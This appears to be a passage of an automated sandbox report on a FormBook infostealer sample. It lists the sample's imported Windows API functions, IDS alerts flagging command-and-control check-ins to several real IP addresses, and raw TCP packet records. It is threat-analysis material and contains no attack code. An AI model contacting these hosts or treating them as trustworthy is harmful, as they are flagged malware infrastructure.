KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T01:54:51.949675+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49949	47.83.1.90	80	TCP
2025-01-11T01:54:51.949675+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49949	47.83.1.90	80	TCP
2025-01-11T01:55:08.547642+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49969	47.83.1.90	80	TCP
2025-01-11T01:55:11.094478+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49970	47.83.1.90	80	TCP
2025-01-11T01:55:13.641316+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49971	47.83.1.90	80	TCP
2025-01-11T01:55:16.269329+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49972	47.83.1.90	80	TCP
2025-01-11T01:55:16.269329+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49972	47.83.1.90	80	TCP
2025-01-11T01:55:22.122213+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49974	185.151.30.223	80	TCP
2025-01-11T01:55:24.608012+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49975	185.151.30.223	80	TCP
2025-01-11T01:55:27.240322+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49976	185.151.30.223	80	TCP
2025-01-11T01:55:29.767492+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T01:55:29.767492+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T01:55:35.612443+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49978	176.57.65.76	80	TCP
2025-01-11T01:55:38.274542+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49979	176.57.65.76	80	TCP
2025-01-11T01:55:40.926704+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49980	176.57.65.76	80	TCP
2025-01-11T01:55:43.316764+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T01:55:43.316764+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T01:55:49.013160+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49982	209.74.79.41	80	TCP
2025-01-11T01:55:51.565930+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49983	209.74.79.41	80	TCP
2025-01-11T01:55:54.123823+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49984	209.74.79.41	80	TCP
2025-01-11T01:55:56.669314+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T01:55:56.669314+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T01:56:03.250833+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49986	46.38.243.234	80	TCP
2025-01-11T01:56:05.799417+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49987	46.38.243.234	80	TCP
2025-01-11T01:56:08.360221+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49988	46.38.243.234	80	TCP
2025-01-11T01:56:11.324500+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T01:56:11.324500+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T01:56:17.569102+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49990	188.114.96.3	80	TCP
2025-01-11T01:56:20.085731+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49991	188.114.96.3	80	TCP
2025-01-11T01:56:22.805907+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49992	188.114.96.3	80	TCP
2025-01-11T01:56:25.422276+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49993	188.114.96.3	80	TCP
2025-01-11T01:56:25.422276+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49993	188.114.96.3	80	TCP
2025-01-11T01:56:39.580906+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49994	18.163.74.139	80	TCP
2025-01-11T01:56:42.253554+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49995	18.163.74.139	80	TCP
2025-01-11T01:56:44.783542+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49996	18.163.74.139	80	TCP
2025-01-11T01:56:47.343332+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T01:56:47.343332+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T01:56:53.446861+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49998	162.218.30.235	80	TCP
2025-01-11T01:56:56.038707+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49999	162.218.30.235	80	TCP
2025-01-11T01:56:58.591231+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50000	162.218.30.235	80	TCP
2025-01-11T01:57:01.108849+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	50001	162.218.30.235	80	TCP
2025-01-11T01:57:01.108849+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50001	162.218.30.235	80	TCP
2025-01-11T01:57:07.417850+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50002	192.186.58.31	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:54:50.304735899 CET	49949	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:54:50.309628963 CET	80	49949	47.83.1.90	192.168.2.7
Jan 11, 2025 01:54:50.309798002 CET	49949	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:54:50.322220087 CET	49949	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:54:50.327162027 CET	80	49949	47.83.1.90	192.168.2.7
Jan 11, 2025 01:54:51.949440002 CET	80	49949	47.83.1.90	192.168.2.7
Jan 11, 2025 01:54:51.949532032 CET	80	49949	47.83.1.90	192.168.2.7
Jan 11, 2025 01:54:51.949675083 CET	49949	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:54:51.952843904 CET	49949	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:54:51.957988977 CET	80	49949	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:07.013943911 CET	49969	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:07.018805027 CET	80	49969	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:07.018930912 CET	49969	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:07.034873009 CET	49969	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:07.039639950 CET	80	49969	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:08.547641993 CET	49969	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:08.552710056 CET	80	49969	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:08.552783966 CET	49969	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:09.566152096 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:09.571363926 CET	80	49970	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:09.571500063 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:09.592060089 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:09.597810030 CET	80	49970	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:11.094477892 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:11.099617958 CET	80	49970	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:11.099715948 CET	49970	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:12.114356995 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:12.119379044 CET	80	49971	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:12.119607925 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:12.135459900 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:12.140413046 CET	80	49971	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:12.140474081 CET	80	49971	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:13.641315937 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:13.646585941 CET	80	49971	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:13.646660089 CET	49971	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:14.660356998 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:14.665270090 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:14.665358067 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:14.674756050 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:14.679519892 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:16.268805027 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:16.268984079 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:16.269329071 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:16.271845102 CET	49972	80	192.168.2.7	47.83.1.90
Jan 11, 2025 01:55:16.276671886 CET	80	49972	47.83.1.90	192.168.2.7
Jan 11, 2025 01:55:21.341087103 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:21.346196890 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:21.346328020 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:21.360460043 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:21.366739988 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:22.122015953 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:22.122136116 CET	80	49974	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:22.122212887 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:22.875684977 CET	49974	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:23.894221067 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:23.899393082 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:23.899497986 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:23.912136078 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:23.916986942 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:24.607872009 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:24.607903957 CET	80	49975	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:24.608011961 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:25.422622919 CET	49975	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:26.441472054 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:26.446389914 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:26.446475983 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:26.461126089 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:26.465984106 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:26.466048956 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:27.239984035 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:27.240068913 CET	80	49976	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:27.240322113 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:27.974803925 CET	49976	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:28.988526106 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:28.993475914 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:28.993741035 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:29.002614975 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:29.007462025 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:29.767249107 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:29.767299891 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:29.767492056 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:29.770502090 CET	49977	80	192.168.2.7	185.151.30.223
Jan 11, 2025 01:55:29.775270939 CET	80	49977	185.151.30.223	192.168.2.7
Jan 11, 2025 01:55:34.895989895 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:34.901554108 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:34.901690960 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:34.916279078 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:34.921086073 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:35.612293005 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:35.612309933 CET	80	49978	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:35.612442970 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:36.422646046 CET	49978	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:37.441356897 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:37.446716070 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:37.446810961 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:37.461265087 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:37.467633963 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:38.274457932 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:38.274477005 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:38.274486065 CET	80	49979	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:38.274542093 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:38.969516039 CET	49979	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:40.101315975 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:40.106194973 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:40.106282949 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:40.123722076 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:40.128652096 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:40.128715038 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:40.926513910 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:40.926642895 CET	80	49980	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:40.926703930 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:41.625870943 CET	49980	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:42.645015955 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:42.649920940 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:42.650048018 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:42.661506891 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:42.666312933 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:43.316428900 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:43.316574097 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:43.316764116 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:43.319588900 CET	49981	80	192.168.2.7	176.57.65.76
Jan 11, 2025 01:55:43.324296951 CET	80	49981	176.57.65.76	192.168.2.7
Jan 11, 2025 01:55:48.426557064 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:48.432356119 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:48.432431936 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:48.447638988 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:48.452502012 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:49.013072014 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:49.013101101 CET	80	49982	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:49.013159990 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:49.953872919 CET	49982	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:50.972588062 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:50.977427959 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:50.977600098 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:50.990367889 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:50.995141983 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:51.565603018 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:51.565845013 CET	80	49983	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:51.565929890 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:52.500715971 CET	49983	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:53.519602060 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:53.524485111 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:53.524615049 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:53.539628983 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:53.545361042 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:53.545917034 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:54.123730898 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:54.123760939 CET	80	49984	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:54.123822927 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:55.047928095 CET	49984	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:56.066553116 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:56.071407080 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:56.071536064 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:56.083450079 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:56.088272095 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:56.669028997 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:56.669181108 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 01:55:56.669313908 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:56.672004938 CET	49985	80	192.168.2.7	209.74.79.41
Jan 11, 2025 01:55:56.676903009 CET	80	49985	209.74.79.41	192.168.2.7
Jan 11, 2025 01:56:01.717727900 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:01.722675085 CET	80	49986	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:01.724215031 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:01.741216898 CET	49986	80	192.168.2.7	46.38.243.234
